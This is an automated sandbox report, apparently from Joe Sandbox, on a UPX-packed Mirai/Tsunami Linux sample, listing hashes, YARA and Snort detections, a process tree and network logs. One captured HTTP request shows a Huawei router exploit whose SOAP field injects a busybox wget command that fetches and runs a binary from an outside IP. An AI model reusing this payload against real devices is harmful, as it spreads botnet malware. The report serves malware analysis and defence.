Edit tour

Linux Analysis Report
NE8O7liu0s

Overview

General Information

Sample Name:	NE8O7liu0s
Analysis ID:	626438
MD5:	2bbe3dc5b85619b7207ec547f6a78508
SHA1:	ef6be828cf9071e4514628bbea20d281d549e70c
SHA256:	598e89a664e3e67a264dc70c0c2328dc56359e05ad6061fc34d8c15770971ba5
Tags:	32elfmipsmirai
Infos:

Detection

Mirai

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Yara detected Mirai

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Sample is packed with UPX

Uses known network protocols on non-standard ports

Sample tries to kill multiple processes (SIGKILL)

Sample contains only a LOAD segment without any section mappings

Yara signature match

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

HTTP GET or POST without a user agent

Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626438
Start date and time: 14/05/202202:14:54	2022-05-14 02:14:54 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	NE8O7liu0s
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal92.spre.troj.evad.lin@0/0@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100
VT rate limit hit for: http://103.136.43.52/bins/Tsunami.x86

Runtime Messages

Command:	/tmp/NE8O7liu0s
PID:	6225
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	kebabware installed
Standard Error:

Process Tree

system is lnxubuntu20

NE8O7liu0s (PID: 6225, Parent: 6124, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/NE8O7liu0s

NE8O7liu0s New Fork (PID: 6227, Parent: 6225)

NE8O7liu0s New Fork (PID: 6229, Parent: 6227)

NE8O7liu0s New Fork (PID: 6230, Parent: 6227)

NE8O7liu0s New Fork (PID: 6232, Parent: 6227)

NE8O7liu0s New Fork (PID: 6233, Parent: 6227)

NE8O7liu0s New Fork (PID: 6237, Parent: 6227)

NE8O7liu0s New Fork (PID: 6239, Parent: 6227)

NE8O7liu0s New Fork (PID: 6241, Parent: 6227)

NE8O7liu0s New Fork (PID: 6243, Parent: 6227)

gnome-session-binary New Fork (PID: 6283, Parent: 1477)

sh (PID: 6283, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications

gsd-print-notifications (PID: 6283, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications

gsd-print-notifications New Fork (PID: 6289, Parent: 6283)

gsd-print-notifications New Fork (PID: 6290, Parent: 6289)

gsd-printer (PID: 6290, Parent: 1, MD5: 7995828cf98c315fd55f2ffb3b22384d) Arguments: /usr/libexec/gsd-printer

xfce4-session New Fork (PID: 6313, Parent: 1900)

rm (PID: 6313, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
NE8O7liu0s	SUSP_ELF_LNX_UPX_Compressed_File	Detects a suspicious ELF binary with UPX compression	Florian Roth	0x8600:$s1: PROT_EXEC\|PROT_WRITE failed. 0x866f:$s2: $Id: UPX 0x8620:$s3: $Info: This file is packed with the UPX executable packer

Memory Dumps

Source	Rule	Description	Author	Strings
6225.1.000000000ef6297b.000000006d73a7a2.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x14f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x1560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x1620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6229.1.000000000ef6297b.000000006d73a7a2.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x14f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x1560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x1620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x201f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x2024c:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x202e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x1f470:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x201f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x2024c:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x202e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x1f470:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 5 entries

Snort Signatures

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.188.50

Timestamp:	192.168.2.23172.65.188.5044500555552027153 05/14/22-02:15:56.359731
SID:	2027153
Source Port:	44500
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.193.152.180

Timestamp:	192.168.2.2388.193.152.18034398802027121 05/14/22-02:15:59.312151
SID:	2027121
Source Port:	34398
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.198.26.37

Timestamp:	192.168.2.2388.198.26.3738100802027121 05/14/22-02:15:44.516920
SID:	2027121
Source Port:	38100
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.250.122.25

Timestamp:	192.168.2.23156.250.122.2554380528692027339 05/14/22-02:15:57.938396
SID:	2027339
Source Port:	54380
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.169.95

Timestamp:	192.168.2.23172.65.169.9544990555552027153 05/14/22-02:16:03.335900
SID:	2027153
Source Port:	44990
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.221.144.129

Timestamp:	192.168.2.2388.221.144.12941178802027121 05/14/22-02:15:49.661036
SID:	2027121
Source Port:	41178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.67.150

Timestamp:	192.168.2.23172.65.67.15059474555552027153 05/14/22-02:15:56.352112
SID:	2027153
Source Port:	59474
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.90.176.237

Timestamp:	192.168.2.2388.90.176.23744584802027121 05/14/22-02:15:51.846554
SID:	2027121
Source Port:	44584
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.85.234.170

Timestamp:	192.168.2.2388.85.234.17050988802027121 05/14/22-02:15:55.583622
SID:	2027121
Source Port:	50988
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.163.115.235

Timestamp:	192.168.2.2388.163.115.23545742802027121 05/14/22-02:15:51.797913
SID:	2027121
Source Port:	45742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.150.139

Timestamp:	192.168.2.23172.65.150.13942616555552027153 05/14/22-02:16:03.318542
SID:	2027153
Source Port:	42616
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.71.210

Timestamp:	192.168.2.23172.65.71.21054402555552027153 05/14/22-02:15:56.342447
SID:	2027153
Source Port:	54402
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.39.149

Timestamp:	192.168.2.23172.65.39.14960752555552027153 05/14/22-02:15:53.260356
SID:	2027153
Source Port:	60752
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.193.168.207

Timestamp:	192.168.2.2388.193.168.20742388802027121 05/14/22-02:15:49.632801
SID:	2027121
Source Port:	42388
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.79.192

Timestamp:	192.168.2.23172.65.79.19236744555552027153 05/14/22-02:15:53.242553
SID:	2027153
Source Port:	36744
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.226.58.60

Timestamp:	192.168.2.23156.226.58.6036698528692027339 05/14/22-02:15:56.717589
SID:	2027339
Source Port:	36698
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.178.37

Timestamp:	192.168.2.23172.65.178.3742472555552027153 05/14/22-02:15:44.534691
SID:	2027153
Source Port:	42472
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.30.39

Timestamp:	192.168.2.23172.65.30.3943676555552027153 05/14/22-02:15:48.668722
SID:	2027153
Source Port:	43676
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.130.160

Timestamp:	192.168.2.23172.65.130.16035856555552027153 05/14/22-02:15:53.242653
SID:	2027153
Source Port:	35856
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.245.44.43

Timestamp:	192.168.2.23156.245.44.4350224528692027339 05/14/22-02:16:04.452185
SID:	2027339
Source Port:	50224
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.125.107.25

Timestamp:	192.168.2.2388.125.107.2537604802027121 05/14/22-02:15:51.892368
SID:	2027121
Source Port:	37604
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.7.26

Timestamp:	192.168.2.23172.65.7.2655700555552027153 05/14/22-02:15:46.602305
SID:	2027153
Source Port:	55700
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.184.34

Timestamp:	192.168.2.23172.65.184.3435476555552027153 05/14/22-02:15:48.685886
SID:	2027153
Source Port:	35476
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.148.69.67

Timestamp:	192.168.2.2388.148.69.6734326802027121 05/14/22-02:16:01.433501
SID:	2027121
Source Port:	34326
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.247.118.29

Timestamp:	192.168.2.2388.247.118.2940302802027121 05/14/22-02:15:58.044039
SID:	2027121
Source Port:	40302
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.228.227.251

Timestamp:	192.168.2.2388.228.227.25145998802027121 05/14/22-02:15:49.667990
SID:	2027121
Source Port:	45998
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: unknown	Network traffic detected: HTTP traffic on port 60930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44056
Source: unknown	Network traffic detected: HTTP traffic on port 41734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36432
Source: unknown	Network traffic detected: HTTP traffic on port 57404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57376
Source: unknown	Network traffic detected: HTTP traffic on port 58856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56040
Source: unknown	Network traffic detected: HTTP traffic on port 44680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48408
Source: unknown	Network traffic detected: HTTP traffic on port 34992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 51548 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50578 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36420
Source: unknown	Network traffic detected: HTTP traffic on port 37100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33388
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57386
Source: unknown	Network traffic detected: HTTP traffic on port 35298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45360
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50750
Source: unknown	Network traffic detected: HTTP traffic on port 56320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33384
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33382
Source: unknown	Network traffic detected: HTTP traffic on port 52404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57392
Source: unknown	Network traffic detected: HTTP traffic on port 56892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57518 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37730
Source: unknown	Network traffic detected: HTTP traffic on port 58832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33376
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 36232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44094
Source: unknown	Network traffic detected: HTTP traffic on port 57850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44096
Source: unknown	Network traffic detected: HTTP traffic on port 39980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39500
Source: unknown	Network traffic detected: HTTP traffic on port 35262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56000
Source: unknown	Network traffic detected: HTTP traffic on port 42474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59996
Source: unknown	Network traffic detected: HTTP traffic on port 52964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41812
Source: unknown	Network traffic detected: HTTP traffic on port 60966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35140
Source: unknown	Network traffic detected: HTTP traffic on port 47004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48442
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50704
Source: unknown	Network traffic detected: HTTP traffic on port 42908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36460
Source: unknown	Network traffic detected: HTTP traffic on port 41938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57336
Source: unknown	Network traffic detected: HTTP traffic on port 44094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36466
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60980
Source: unknown	Network traffic detected: HTTP traffic on port 57988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56010
Source: unknown	Network traffic detected: HTTP traffic on port 36920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 42728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48434
Source: unknown	Network traffic detected: HTTP traffic on port 57200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48430
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 57162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58678
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56024
Source: unknown	Network traffic detected: HTTP traffic on port 44528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57352
Source: unknown	Network traffic detected: HTTP traffic on port 39992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 37492 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50728
Source: unknown	Network traffic detected: HTTP traffic on port 52060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35104
Source: unknown	Network traffic detected: HTTP traffic on port 36178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39544
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60136
Source: unknown	Network traffic detected: HTTP traffic on port 47536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59154
Source: unknown	Network traffic detected: HTTP traffic on port 47090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35180
Source: unknown	Network traffic detected: HTTP traffic on port 43288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40520
Source: unknown	Network traffic detected: HTTP traffic on port 40830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52520
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48480
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39528
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60144
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48478
Source: unknown	Network traffic detected: HTTP traffic on port 56230 -> 443
